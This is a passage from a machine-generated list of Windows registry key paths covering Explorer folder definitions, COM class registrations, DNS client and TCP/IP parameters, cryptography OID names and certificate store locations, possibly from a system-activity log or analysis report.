"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name", "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0", 